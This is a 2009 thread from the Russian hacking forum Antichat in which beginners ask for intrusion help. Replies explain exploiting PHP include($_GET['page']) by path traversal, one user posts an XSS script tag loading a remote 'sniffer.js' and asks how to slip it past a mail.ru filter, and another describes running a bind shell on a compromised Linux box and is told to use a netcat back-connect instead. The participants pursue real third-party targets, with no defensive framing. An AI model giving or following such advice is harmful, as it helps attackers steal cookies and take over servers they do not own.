ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.12.2009, 15:44
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме: 124940
Репутация:
1
|
|
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
|
|
|

24.12.2009, 15:47
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Сообщение от гаррет-тень
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
Может перед тем,как становиться крутым хакером, стоит почитать о том как работают те или иные ЯП? И вообще в целом о http и интернете.Тогда такие вопросы пропадут сами собой.
|
|
|

24.12.2009, 15:57
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме: 5571194
Репутация:
1934
|
|
Сообщение от гаррет-тень
Я новичок и вот прочтал про php инъекции. Пошарился в гугле и увидел такое: Часто неопытные программисты делают очень большие ошибки. Если например, открыть файл, не проверяя, существует ли он, то это будет очень большая дыра. Пример такой ошибки: include($_GET['page']); А как открыть сам php код?Просто я встретил сайт с php а как его открыть не знаю( Подскажите плиз)
php-include
При таком коде include($_GET['page']); php инклудит файл с именем page в папке со скриптом(можно выйти из границ папки напр. ?page=../../file.php). Соответственно, исполняется php-код и возвращается результат на страницу.
читалка файлов
Чтобы увидеть php-код на странице, нужно искать другие реализации кода, направленные именно на чтение файла (напр. file(), fopen+fgets, идр.) + должен быть вывод на страницу.
__________________
Появляюсь редко. Важные дела в реале.
|
|
|

24.12.2009, 16:00
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме: 124940
Репутация:
1
|
|
поищу прям ща))) и все-таки?
|
|
|

24.12.2009, 16:07
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
Провел на форуме: 124940
Репутация:
1
|
|
AFoST, спасиб)
|
|
|

24.12.2009, 18:55
|
|
Новичок
Регистрация: 23.12.2009
Сообщений: 1
Провел на форуме: 35871
Репутация:
0
|
|
Здраствуйте можете помочь.Как обойти фильтр на mail.ru(он вроде заменяет точку и пробел на нижнее подчёркивание)Как должна выглядить этот скрипт
%3CSCRIPT_type=text/javascript_src=http://httpz.ru/sniffer.js></SCRIPT>"
|
|
|

25.12.2009, 03:00
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме: 101927
Репутация:
0
|
|
Пытался пробиндить машину,залил бинд, дал команду perl bind.pl . И ужеминут 15 никакого результата, просто грузится и все. Что с этим делать?
Linux 2.6
|
|
|

25.12.2009, 03:23
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
Сообщение от a1ertso
Пытался пробиндить машину,залил бинд, дал команду perl bind.pl . И ужеминут 15 никакого результата, просто грузится и все. Что с этим делать?
Linux 2.6
делай бэк-коннект. информация есть на форуме.
UPD:http://forum.antichat.ru/thread151993.html
|
|
|

25.12.2009, 03:33
|
|
Новичок
Регистрация: 16.12.2009
Сообщений: 29
Провел на форуме: 101927
Репутация:
0
|
|
пробовал, тоже самое... Только пишет
Now script try connect to 1хх.хх.ххх.ххх port 32767 ...
так и весит
|
|
|

25.12.2009, 03:37
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме: 5290740
Репутация:
912
|
|
Сообщение от a1ertso
пробовал, тоже самое... Только пишет так и весит
неткат у себя запустил?делай всё как в мануале, всё пашет(мб у тебя айпи динамический?)
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|